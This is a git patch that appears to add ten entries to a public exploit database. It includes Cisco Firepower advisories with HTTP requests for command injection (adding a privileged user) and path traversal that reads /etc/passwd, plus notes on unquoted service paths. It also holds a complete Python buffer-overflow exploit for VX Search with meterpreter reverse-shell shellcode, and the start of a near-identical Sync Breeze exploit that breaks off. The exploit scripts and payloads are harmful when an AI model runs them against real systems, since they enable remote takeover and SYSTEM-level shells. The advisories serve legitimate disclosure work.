From 5fbed830863bba28299473bdded34302b3254cbf Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 6 Oct 2016 05:01:22 +0000 Subject: [PATCH] DB: 2016-10-06 10 new exploits Cisco Firepower Threat Management Console 6.0.1 - Hard-Coded MySQL Credentials Bind 9 DNS Server - Denial of Service ISC BIND 9 - Denial of Service Cisco Firepower Threat Management Console 6.0.1 - Local File Inclusion Cisco Firepower Threat Management Console 6.0.1 - Remote Command Execution VX Search Enterprise 9.0.26 - Buffer Overflow Sync Breeze Enterprise 8.9.24 - Buffer Overflow Dup Scout Enterprise 9.0.28 - Buffer Overflow Disk Sorter Enterprise 9.0.24 - Buffer Overflow Disk Savvy Enterprise 9.0.32 - Buffer Overflow Abyss Web Server X1 2.11.1 - Unquoted Service Path Privilege Escalation Fortitude HTTP 1.0.4.0 - Unquoted Service Path Privilege Escalation --- files.csv | 12 ++- platforms/cgi/webapps/40463.txt | 151 ++++++++++++++++++++++++++++++ platforms/cgi/webapps/40464.txt | 115 +++++++++++++++++++++++ platforms/linux/local/40465.txt | 115 +++++++++++++++++++++++ platforms/windows/local/40460.txt | 46 +++++++++ platforms/windows/local/40461.txt | 47 ++++++++++ platforms/windows/remote/40455.py | 93 ++++++++++++++++++ platforms/windows/remote/40456.py | 93 ++++++++++++++++++ platforms/windows/remote/40457.py | 93 ++++++++++++++++++ platforms/windows/remote/40458.py | 93 ++++++++++++++++++ platforms/windows/remote/40459.py | 93 ++++++++++++++++++ 11 files changed, 950 insertions(+), 1 deletion(-) create mode 100755 platforms/cgi/webapps/40463.txt create mode 100755 platforms/cgi/webapps/40464.txt create mode 100755 platforms/linux/local/40465.txt create mode 100755 platforms/windows/local/40460.txt create mode 100755 platforms/windows/local/40461.txt create mode 100755 platforms/windows/remote/40455.py create mode 100755 platforms/windows/remote/40456.py create mode 100755 platforms/windows/remote/40457.py create mode 100755 platforms/windows/remote/40458.py create mode 100755 platforms/windows/remote/40459.py diff --git a/files.csv b/files.csv index 70cf5f95d..c24279e4f 100755 --- a/files.csv +++ b/files.csv @@ -3810,6 +3810,7 @@ id,file,description,date,author,platform,type,port 4155,platforms/windows/remote/4155.html,"HP Digital Imaging (hpqvwocx.dll 2.1.0.556) - SaveToFile() Exploit",2007-07-06,shinnai,windows,remote,0 4156,platforms/php/webapps/4156.txt,"LimeSurvey (phpsurveyor) 1.49rc2 - Remote File Inclusion",2007-07-06,"Yakir Wizman",php,webapps,0 4157,platforms/windows/remote/4157.cpp,"SAP DB 7.4 - WebTools Remote Overwrite (SEH)",2007-07-07,Heretic2,windows,remote,9999 +40465,platforms/linux/local/40465.txt,"Cisco Firepower Threat Management Console 6.0.1 - Hard-Coded MySQL Credentials",2016-10-05,KoreLogic,linux,local,0 4158,platforms/windows/remote/4158.html,"NeoTracePro 3.25 - ActiveX TraceTarget() Remote Buffer Overflow",2007-07-07,nitr0us,windows,remote,0 4159,platforms/php/webapps/4159.txt,"GameSiteScript 3.1 - (profile id) SQL Injection",2007-07-07,Xenduer77,php,webapps,0 4160,platforms/windows/remote/4160.html,"Chilkat Zip ActiveX Component 12.4 - Multiple Insecure Methods",2007-07-07,shinnai,windows,remote,0 @@ -32999,7 +33000,7 @@ id,file,description,date,author,platform,type,port 36487,platforms/php/webapps/36487.txt,"WordPress Plugin Comment Rating 2.9.20 - 'path' Parameter Cross-Site Scripting",2012-01-03,"The Evil Thinker",php,webapps,0 36488,platforms/php/webapps/36488.txt,"WordPress Plugin WHOIS 1.4.2 3 - 'domain' Parameter Cross-Site Scripting",2012-01-03,Atmon3r,php,webapps,0 36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 - 'ddb' Parameter Cross-Site Scripting",2012-01-04,"Jonathan Claudius",php,webapps,0 -40453,platforms/multiple/dos/40453.py,"Bind 9 DNS Server - Denial of Service",2016-10-04,Infobyte,multiple,dos,53 +40453,platforms/multiple/dos/40453.py,"ISC BIND 9 - Denial of Service",2016-10-04,Infobyte,multiple,dos,53 36490,platforms/php/webapps/36490.py,"WordPress Plugin WP Marketplace 2.4.0 - Remote Code Execution (Add WP Admin)",2015-03-25,"Claudio Viviani",php,webapps,0 36491,platforms/windows/remote/36491.txt,"Adobe Flash Player - Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote,0 36492,platforms/php/webapps/36492.txt,"GraphicsClone Script - 'term' Parameter Cross-Site Scripting",2012-01-04,Mr.PaPaRoSSe,php,webapps,0 @@ -36169,6 +36170,7 @@ id,file,description,date,author,platform,type,port 39869,platforms/lin_x86-64/shellcode/39869.c,"Linux/x86-64 - XOR Encode execve Shellcode",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 39870,platforms/php/webapps/39870.html,"Flatpress 1.0.3 - Cross-Site Request Forgery / Arbitrary File Upload",2016-05-31,LiquidWorm,php,webapps,80 39871,platforms/cgi/webapps/39871.txt,"AirOS NanoStation M2 5.6-beta - Multiple Vulnerabilities",2016-05-31,"Pablo Rebolini",cgi,webapps,80 +40464,platforms/cgi/webapps/40464.txt,"Cisco Firepower Threat Management Console 6.0.1 - Local File Inclusion",2016-10-05,KoreLogic,cgi,webapps,0 39872,platforms/php/webapps/39872.txt,"ProcessMaker 3.0.1.7 - Multiple Vulnerabilities",2016-05-31,"Mickael Dorigny",php,webapps,80 39873,platforms/linux/dos/39873.py,"CCextractor 0.80 - Crash (PoC)",2016-05-31,"David Silveiro",linux,dos,0 39874,platforms/windows/remote/39874.rb,"HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",windows,remote,0 @@ -36179,6 +36181,7 @@ id,file,description,date,author,platform,type,port 39879,platforms/php/webapps/39879.txt,"Joomla! Extension SecurityCheck 2.8.9 - Multiple Vulnerabilities",2016-06-02,"ADEO Security",php,webapps,80 39880,platforms/jsp/webapps/39880.txt,"Liferay CE < 6.2 CE GA6 - Persistent Cross-Site Scripting",2016-06-02,"Fernando Câmara",jsp,webapps,0 39881,platforms/php/webapps/39881.txt,"Relay Ajax Directory Manager relayb01-071706 / 1.5.1 / 1.5.3 - Unauthenticated Arbitrary File Upload",2016-06-02,"RedTeam Pentesting GmbH",php,webapps,80 +40463,platforms/cgi/webapps/40463.txt,"Cisco Firepower Threat Management Console 6.0.1 - Remote Command Execution",2016-10-05,KoreLogic,cgi,webapps,0 39882,platforms/multiple/dos/39882.txt,"Websockify (C Implementation) 0.8.0 - Buffer Overflow",2016-06-02,"RedTeam Pentesting GmbH",multiple,dos,0 39884,platforms/php/webapps/39884.html,"Dream Gallery 1.0 - Cross-Site Request Forgery (Add Admin)",2016-06-06,"Ali Ghanbari",php,webapps,80 39885,platforms/multiple/shellcode/39885.c,"Linux/Windows/BSD x86_64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,multiple,shellcode,0 @@ -36572,3 +36575,10 @@ id,file,description,date,author,platform,type,port 40450,platforms/linux/local/40450.txt,"Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation",2016-10-03,"Dawid Golunski",linux,local,0 40451,platforms/win_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",win_x86-64,local,0 40452,platforms/windows/remote/40452.py,"Disk Pulse Enterprise 9.0.34 - Buffer Overflow",2016-10-03,Tulpa,windows,remote,80 +40455,platforms/windows/remote/40455.py,"VX Search Enterprise 9.0.26 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80 +40456,platforms/windows/remote/40456.py,"Sync Breeze Enterprise 8.9.24 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80 +40457,platforms/windows/remote/40457.py,"Dup Scout Enterprise 9.0.28 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80 +40458,platforms/windows/remote/40458.py,"Disk Sorter Enterprise 9.0.24 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80 +40459,platforms/windows/remote/40459.py,"Disk Savvy Enterprise 9.0.32 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80 +40460,platforms/windows/local/40460.txt,"Abyss Web Server X1 2.11.1 - Unquoted Service Path Privilege Escalation",2016-10-05,Tulpa,windows,local,0 +40461,platforms/windows/local/40461.txt,"Fortitude HTTP 1.0.4.0 - Unquoted Service Path Privilege Escalation",2016-10-05,Tulpa,windows,local,0 diff --git a/platforms/cgi/webapps/40463.txt b/platforms/cgi/webapps/40463.txt new file mode 100755 index 000000000..b9f866ae6 --- /dev/null +++ b/platforms/cgi/webapps/40463.txt @@ -0,0 +1,151 @@ +KL-001-2016-007 : Cisco Firepower Threat Management Console Remote Command +Execution Leading to Root Access + +Title: Cisco Firepower Threat Management Console Remote Command Execution +Leading to Root Access +Advisory ID: KL-001-2016-007 +Publication Date: 2016.10.05 +Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-007.txt + + +1. Vulnerability Details + + Affected Vendor: Cisco + Affected Product: Firepower Threat Management Console + Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213) + Platform: Embedded Linux + CWE Classification: CWE-434: Unrestricted Upload of File with Dangerous + Type, CWE-94: Improper Control of Generation of Code + Impact: Arbitrary Code Execution + Attack vector: HTTP + CVE-ID: CVE-2016-6433 + +2. Vulnerability Description + + An authenticated user can run arbitrary system commands as + the www user which leads to root. + +3. Technical Description + + A valid session and CSRF token is required. The webserver runs as + a non-root user which is permitted to sudo commands as root with + no password. + + POST /DetectionPolicy/rules/rulesimport.cgi?no_mojo=1 HTTP/1.1 + Host: 1.3.3.7 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) +Gecko/20100101 Firefox/45.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate, br + DNT: 1 + Cookie: CGISESSID=4919a7838198009bba48f6233d0bd1c6 + Connection: close + Content-Type: multipart/form-data; +boundary=---------------------------15519792567789791301241925798 + Content-Length: 813 + + -----------------------------15519792567789791301241925798 + Content-Disposition: form-data; name="manual_update" + + 1 + -----------------------------15519792567789791301241925798 + Content-Disposition: form-data; name="source" + + file + -----------------------------15519792567789791301241925798 + Content-Disposition: form-data; name="file"; +filename="Sourcefire_Rule_Update-2016-03-04-001-vrt.sh" + Content-Type: application/octet-stream + + sudo useradd -G ldapgroup -p `openssl passwd -1 korelogic` korelogic + -----------------------------15519792567789791301241925798 + Content-Disposition: form-data; name="action_submit" + + Import + -----------------------------15519792567789791301241925798 + Content-Disposition: form-data; name="sf_action_id" + + 8c6059ae8dbedc089877b16b7be2ae7f + -----------------------------15519792567789791301241925798-- + + + HTTP/1.1 200 OK + Date: Sat, 23 Apr 2016 13:38:01 GMT + Server: Apache + Vary: Accept-Encoding + X-Frame-Options: SAMEORIGIN + Content-Length: 49998 + Connection: close + Content-Type: text/html; charset=utf-8 + + ... + + $ ssh korelogic@1.3.3.7 + Password: + + Copyright 2004-2016, Cisco and/or its affiliates. All rights reserved. + Cisco is a registered trademark of Cisco Systems, Inc. + All other trademarks are property of their respective owners. + + Cisco Fire Linux OS v6.0.1 (build 37) + Cisco Firepower Management Center for VMWare v6.0.1 (build 1213) + + Could not chdir to home directory /Volume/home/korelogic: No such file or +directory + korelogic@firepower:/$ sudo su - + Password: + root@firepower:~# + +4. Mitigation and Remediation Recommendation + + The vendor has acknowledged this vulnerability but has + not issued a fix. Vendor acknowledgement available at: + +https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc + +5. Credit + + This vulnerability was discovered by Matt Bergin (@thatguylevel) of +KoreLogic, Inc. + +6. Disclosure Timeline + + 2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco. + 2016.06.30 - Cisco acknowledges receipt of vulnerability report. + 2016.07.20 - KoreLogic and Cisco discuss remediation timeline for + this vulnerability and for 3 others reported in the + same product. + 2016.08.12 - 30 business days have elapsed since the vulnerability was + reported to Cisco. + 2016.09.02 - 45 business days have elapsed since the vulnerability was + reported to Cisco. + 2016.09.09 - KoreLogic asks for an update on the status of the + remediation efforts. + 2016.09.15 - Cisco confirms remediation is underway and soon to be + completed. + 2016.09.28 - Cisco informs KoreLogic that the acknowledgement details + will be released publicly on 2016.10.05. + 2016.10.05 - Public disclosure. + +7. Proof of Concept + + See Technical Description + + +The contents of this advisory are copyright(c) 2016 +KoreLogic, Inc. and are licensed under a Creative Commons +Attribution Share-Alike 4.0 (United States) License: +http://creativecommons.org/licenses/by-sa/4.0/ + +KoreLogic, Inc. is a founder-owned and operated company with a +proven track record of providing security services to entities +ranging from Fortune 500 to small and mid-sized companies. We +are a highly skilled team of senior security consultants doing +by-hand security assessments for the most important networks in +the U.S. and around the world. We are also developers of various +tools and resources aimed at helping the security community. +https://www.korelogic.com/about-korelogic.html + +Our public vulnerability disclosure policy is available at: +https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt \ No newline at end of file diff --git a/platforms/cgi/webapps/40464.txt b/platforms/cgi/webapps/40464.txt new file mode 100755 index 000000000..3cef15044 --- /dev/null +++ b/platforms/cgi/webapps/40464.txt @@ -0,0 +1,115 @@ +KL-001-2016-006 : Cisco Firepower Threat Management Console Local File Inclusion + +Title: Cisco Firepower Threat Management Console Local File Inclusion +Advisory ID: KL-001-2016-006 +Publication Date: 2016.10.05 +Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-006.txt + + +1. Vulnerability Details + + Affected Vendor: Cisco + Affected Product: Firepower Threat Management Console + Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213) + Platform: Embedded Linux + CWE Classification: CWE-73: External Control of File Name or Path + Impact: Information Disclosure + Attack vector: HTTP + CVE-ID: CVE-2016-6435 + +2. Vulnerability Description + + An authenticated user can access arbitrary files on the local system. + +3. Technical Description + + Requests that take a file path do not properly filter what files can + be requested. The webserver does not run as root, so files such as + /etc/shadow are not readable. + + GET /events/reports/view.cgi?download=1&files=../../../etc/passwd%00 HTTP/1.1 + Host: 1.3.3.7 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) +Gecko/20100101 Firefox/45.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate, br + DNT: 1 + Cookie: CGISESSID=2ee7e6f19a104f4453e201f26fdbd6f3 + Connection: close + + HTTP/1.1 200 OK + Date: Fri, 22 Apr 2016 23:58:41 GMT + Server: Apache + Content-Disposition: attachment; filename=passwd + X-Frame-Options: SAMEORIGIN + Connection: close + Content-Type: application/octet-stream + Content-Length: 623 + + root:x:0:0:Operator:/root:/bin/sh + bin:x:1:1:bin:/bin:/sbin/nologin + daemon:x:2:2:daemon:/sbin:/sbin/nologin + mysql:x:27:27:MySQL:/var/lib/mysql:/sbin/nologin + nobody:x:99:99:nobody:/:/sbin/nologin + sshd:x:33:33:sshd:/:/sbin/nologin + www:x:67:67:HTTP server:/var/www:/sbin/nologin + sfrna:x:88:88:SF RNA User:/Volume/home/sfrna:/sbin/nologin + snorty:x:90:90:Snorty User:/Volume/home/snorty:/sbin/nologin + sfsnort:x:95:95:SF Snort User:/Volume/home/sfsnort:/sbin/nologin + sfremediation:x:103:103::/Volume/home/remediations:/sbin/nologin + admin:x:100:100::/Volume/home/admin:/bin/sh + casuser:x:101:104:CiscoUser:/var/opt/CSCOpx:/bin/bash + +4. Mitigation and Remediation Recommendation + + The vendor has issued a patch for this vulnerability + in version 6.1. Vendor acknowledgement available at: + +https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc2 + +5. Credit + + This vulnerability was discovered by Matt Bergin (@thatguylevel) + of KoreLogic, Inc. + +6. Disclosure Timeline + + 2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco. + 2016.06.30 - Cisco acknowledges receipt of vulnerability report. + 2016.07.20 - KoreLogic and Cisco discuss remediation timeline for + this vulnerability and for 3 others reported in the + same product. + 2016.08.12 - 30 business days have elapsed since the vulnerability was + reported to Cisco. + 2016.09.02 - 45 business days have elapsed since the vulnerability was + reported to Cisco. + 2016.09.09 - KoreLogic asks for an update on the status of the + remediation efforts. + 2016.09.15 - Cisco confirms remediation is underway and soon to be + completed. + 2016.09.28 - Cisco informs KoreLogic that the remediation details will + be released publicly on 2016.10.05. + 2016.10.05 - Public disclosure. + +7. Proof of Concept + + See Technical Description + + +The contents of this advisory are copyright(c) 2016 +KoreLogic, Inc. and are licensed under a Creative Commons +Attribution Share-Alike 4.0 (United States) License: +http://creativecommons.org/licenses/by-sa/4.0/ + +KoreLogic, Inc. is a founder-owned and operated company with a +proven track record of providing security services to entities +ranging from Fortune 500 to small and mid-sized companies. We +are a highly skilled team of senior security consultants doing +by-hand security assessments for the most important networks in +the U.S. and around the world. We are also developers of various +tools and resources aimed at helping the security community. +https://www.korelogic.com/about-korelogic.html + +Our public vulnerability disclosure policy is available at: +https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt \ No newline at end of file diff --git a/platforms/linux/local/40465.txt b/platforms/linux/local/40465.txt new file mode 100755 index 000000000..52ce79911 --- /dev/null +++ b/platforms/linux/local/40465.txt @@ -0,0 +1,115 @@ +KL-001-2016-005 : Cisco Firepower Threat Management Console Hard-coded MySQL +Credentials + +Title: Cisco Firepower Threat Management Console Hard-coded MySQL Credentials +Advisory ID: KL-001-2016-005 +Publication Date: 2016.10.05 +Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-005.txt + + +1. Vulnerability Details + + Affected Vendor: Cisco + Affected Product: Firepower Threat Management Console + Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213) + Platform: Embedded Linux + CWE Classification: CWE-798: Use of Hard-coded Credentials + Impact: Authentication Bypass + CVE-ID: CVE-2016-6434 + +2. Vulnerability Description + + The root account for the local MySQL database has poor password + complexity. + + +3. Technical Description + + root@firepower:/Volume/6.0.1# mysql -u root --password=admin + Warning: Using a password on the command line interface can be insecure. + Welcome to the MySQL monitor. Commands end with ; or \g. + Your MySQL connection id is 23348 + Server version: 5.6.24-enterprise-commercial-advanced-log MySQL Enterprise +Server - Advanced Edition (Commercial) + + Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved. + + Oracle is a registered trademark of Oracle Corporation and/or its + affiliates. Other names may be trademarks of their respective + owners. + + Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + + mysql> show databases; + +--------------------+ + | Database | + +--------------------+ + | information_schema | + | Sourcefire | + | external_data | + | external_schema | + | mysql | + | performance_schema | + | sfsnort | + +--------------------+ + 7 rows in set (0.00 sec) + + mysql> + + Note that mysqld listens only on loopback, so a remote attacker + would have to leverage some other condition to be able to reach + the mysql daemon. + +4. Mitigation and Remediation Recommendation + + The vendor has acknowledged this vulnerability + but has not released a fix for the + issue. Vendor acknowledgement available at: + +https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc1 + +5. Credit + + This vulnerability was discovered by Matt Bergin (@thatguylevel) + of KoreLogic, Inc. + +6. Disclosure Timeline + + 2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco. + 2016.06.30 - Cisco acknowledges receipt of vulnerability report. + 2016.07.20 - KoreLogic and Cisco discuss remediation timeline for + this vulnerability and for 3 others reported in the + same product. + 2016.08.12 - 30 business days have elapsed since the vulnerability was + reported to Cisco. + 2016.09.02 - 45 business days have elapsed since the vulnerability was + reported to Cisco. + 2016.09.09 - KoreLogic asks for an update on the status of the + remediation efforts. + 2016.09.15 - Cisco confirms remediation is underway and soon to be + completed. + 2016.09.28 - Cisco informs KoreLogic that the acknowledgement details + will be released publicly on 2016.10.05. + 2016.10.05 - Public disclosure. + +7. Proof of Concept + + See Technical Description + + +The contents of this advisory are copyright(c) 2016 +KoreLogic, Inc. and are licensed under a Creative Commons +Attribution Share-Alike 4.0 (United States) License: +http://creativecommons.org/licenses/by-sa/4.0/ + +KoreLogic, Inc. is a founder-owned and operated company with a +proven track record of providing security services to entities +ranging from Fortune 500 to small and mid-sized companies. We +are a highly skilled team of senior security consultants doing +by-hand security assessments for the most important networks in +the U.S. and around the world. We are also developers of various +tools and resources aimed at helping the security community. +https://www.korelogic.com/about-korelogic.html + +Our public vulnerability disclosure policy is available at: +https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt \ No newline at end of file diff --git a/platforms/windows/local/40460.txt b/platforms/windows/local/40460.txt new file mode 100755 index 000000000..f01276108 --- /dev/null +++ b/platforms/windows/local/40460.txt @@ -0,0 +1,46 @@ +# Exploit Title: Abyss Web Server X1 2.11.1 Multiple Local Privilege Escalation +# Date: 05/10/2016 +# Exploit Author: Tulpa +# Contact: tulpa@tulpa-security.com +# Author website: www.tulpa-security.com +# Author twitter: @tulpa_security +# Vendor Homepage: http://aprelium.com/ +# Application Download: http://aprelium.com/abyssws/download.php +# Version: Software Version 2.11.1 +# Tested on: Windows 7 x86 +# Shout-out to carbonated and ozzie_offsec + +1. Description: + +Abyss Web Server installs a service called 'AbyssWebServer' with an unquoted service path running with SYSTEM privileges. +This could potentially allow an authorized but non-privileged local +user to execute arbitrary code with elevated privileges on the system. Abyss Web Server also suffers from weak file and folder permissions which could allow + +an unauthorized user to swop out executable files with their own payload. + +2. Proof + +C:\Program Files>sc qc AbyssWebServer +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: AbyssWebServer + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Abyss Web Server\abyssws.exe --service + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Abyss Web Server + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + +3. Exploit: + +A successful attempt would require the local user to be able to insert their +code in the system root path undetected by the OS or other security applications +where it could potentially be executed during application startup or reboot. +If successful, the local user's code would execute with the elevated privileges +of the application. + + diff --git a/platforms/windows/local/40461.txt b/platforms/windows/local/40461.txt new file mode 100755 index 000000000..2b6c179d6 --- /dev/null +++ b/platforms/windows/local/40461.txt @@ -0,0 +1,47 @@ +# Exploit Title: Fortitude HTTP 1.0.4.0 Unquoted Service Path Elevation of Privilege +# Date: 05/10/2016 +# Exploit Author: Tulpa +# Contact: tulpa@tulpa-security.com +# Author website: www.tulpa-security.com +# Author twitter: @tulpa_security +# Vendor Homepage: http://www.networkdls.com/ +# Software Link: http://www.networkdls.com/Software/View/Fortitude_HTTP +# Version: Software Version 1.0.4.0 +# Tested on: Windows 7 x86 +# Shout-out to carbonated and ozzie_offsec + +1. Description: + +Netgear Genie installs a service called 'Fortitude HTTP' with an unquoted service path + +running with SYSTEM privileges. +This could potentially allow an authorized but non-privileged local +user to execute arbitrary code with elevated privileges on the system. + +2. Proof + +C:\Program Files>sc qc "Fortitude HTTP" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: Fortitude HTTP + TYPE : 110 WIN32_OWN_PROCESS (interactive) + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\NetworkDLS\Fortitude HTTP\Bin +\FortitudeSvc.exe /RunService + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : NetworkDLS Fortitude HTTP + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + +3. Exploit: + +A successful attempt would require the local user to be able to insert their +code in the system root path undetected by the OS or other security applications +where it could potentially be executed during application startup or reboot. +If successful, the local user's code would execute with the elevated privileges +of the application. + + diff --git a/platforms/windows/remote/40455.py b/platforms/windows/remote/40455.py new file mode 100755 index 000000000..c9c729f81 --- /dev/null +++ b/platforms/windows/remote/40455.py @@ -0,0 +1,93 @@ +#!/usr/bin/python + +print "VX Search Enterprise 9.0.26 Buffer Overflow Exploit" +print "Author: Tulpa / tulpa[at]tulpa-security[dot]com" + +#Author website: www.tulpa-security.com +#Author twitter: @tulpa_security + +#Exploit will land you NT AUTHORITY\SYSTEM +#You do not need to be authenticated, password below is garbage +#Swop out IP, shellcode and remember to adjust '\x41' for bytes +#Tested on Windows 7 x86 Enterprise SP1 + +#Greetings to ozzie_offsec and carbonated + +import socket +import sys + +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +connect=s.connect(('192.168.123.132',80)) + +#bad chars \x00\x0a\x0d\x26 + +#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest + +#payload size 308 + +buf = "" +buf += "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b" +buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9" +buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda" +buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a" +buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8" +buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c" +buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1" +buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76" +buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27" +buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb" +buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4" +buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17" +buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40" +buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55" +buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa" +buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48" +buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b" +buf += "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8" +buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84" +buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6" +buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c" +buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1" +buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f" +buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc" + +#pop pop ret 100159be + +nseh = "\x90\x90\xEB\x0B" +seh = "\xbe\x59\x01\x10" + +egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" +egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + + +evil = "POST /login HTTP/1.1\r\n" +evil += "Host: 192.168.123.132\r\n" +evil += "User-Agent: Mozilla/5.0\r\n" +evil += "Connection: close\r\n" +evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" +evil += "Accept-Language: en-us,en;q=0.5\r\n" +evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" +evil += "Keep-Alive: 300\r\n" +evil += "Proxy-Connection: keep-alive\r\n" +evil += "Content-Type: application/x-www-form-urlencoded\r\n" +evil += "Content-Length: 17000\r\n\r\n" +evil += "username=admin" +evil += "&password=aaaaa\r\n" +evil += "\x41" * 12292 #subtract/add for payload +evil += "w00tw00t" +evil += "\x90" * 20 +evil += buf +evil += "\x90" * 50 +evil += "\x42" * 1614 +evil += nseh +evil += seh +evil += "\x90" * 20 +evil += egghunter +evil += "\x90" * 7000 + +print 'Sending evil buffer...' +s.send(evil) +print 'Payload Sent!' +s.close() + + diff --git a/platforms/windows/remote/40456.py b/platforms/windows/remote/40456.py new file mode 100755 index 000000000..0b7430373 --- /dev/null +++ b/platforms/windows/remote/40456.py @@ -0,0 +1,93 @@ +#!/usr/bin/python + +print "Sync Breeze Enterprise 8.9.24 Buffer Overflow Exploit" +print "Author: Tulpa / tulpa[at]tulpa-security[dot]com" + +#Author website: www.tulpa-security.com +#Author twitter: @tulpa_security + +#Exploit will land you NT AUTHORITY\SYSTEM +#You do not need to be authenticated, password below is garbage +#Swop out IP, shellcode and remember to adjust '\x41' for bytes +#Tested on Windows 7 x86 Enterprise SP1 + +#Greetings to ozzie_offsec and carbonated + +import socket +import sys + +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +connect=s.connect(('192.168.123.132',80)) + +#bad chars \x00\x0a\x0d\x26 + +#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest + +#payload size 308 + +buf = "" +buf += 